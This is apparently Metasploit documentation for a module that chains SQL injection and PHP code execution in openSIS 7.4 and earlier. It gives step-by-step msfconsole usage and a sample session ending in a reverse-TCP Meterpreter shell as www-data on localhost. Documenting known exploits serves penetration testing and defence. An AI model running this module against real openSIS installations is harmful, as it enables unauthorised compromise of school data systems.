2020-07-01 23:51:17 +02:00
## Vulnerable Application
This module exploits multiple vulnerabilities in [openSIS ](https://www.opensis.com/ ) 7.4 and prior versions which could be abused by unauthenticated attackers to execute arbitrary PHP code. It is based on these advisories:
- http://karmainsecurity.com/KIS-2020-06
- http://karmainsecurity.com/KIS-2020-07
- http://karmainsecurity.com/KIS-2020-08
The module has been successfully tested against [openSIS ](https://www.opensis.com/ ) versions 7.3 and 7.4 running on Ubuntu. Older versions might be affected as well.
2020-07-03 17:43:10 +02:00
Download link: https://sourceforge.net/projects/opensis-ce/files/
2020-07-01 23:51:17 +02:00
## Verification Steps
1. Install the web application
2. Start msfconsole
3. Do: ```use unix/webapp/opensis_chain_exec` ``
4. Do: ```set RHOSTS [IP]` ``
5. Do: ```set TARGETURI [/path/to/opensis]` ``
6. Do: ```run` ``
7. You should get a shell.
## Options
### TARGETURI
The base path to the web application (e.g. `/opensis/` ). The default value is `/` .
## Scenarios
**openSIS 7.4 running on Ubuntu 18.04.4 **
```
msf5 > use unix/webapp/opensis_chain_exec
msf5 exploit(unix/webapp/opensis_chain_exec) > set RHOSTS localhost
msf5 exploit(unix/webapp/opensis_chain_exec) > set TARGETURI /opensis/
msf5 exploit(unix/webapp/opensis_chain_exec) > check
[*] Retrieving session cookie
[*] Injecting malicious SQL into session variable
[*] Calling ForExport.php to set $_SESSION['_REQUEST_vars']
[*] Executing PHP code by calling Bottom.php
[+] 127.0.0.1:80 - The target is vulnerable.
msf5 exploit(unix/webapp/opensis_chain_exec) > run
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Retrieving session cookie
[*] Injecting malicious SQL into session variable
[*] Calling ForExport.php to set $_SESSION['_REQUEST_vars']
[*] Executing PHP code by calling Bottom.php
[*] Sending stage (38288 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:45460) at 2020-07-01 23:31:43 +0200
meterpreter > getuid
Server username: www-data (33)
meterpreter >
```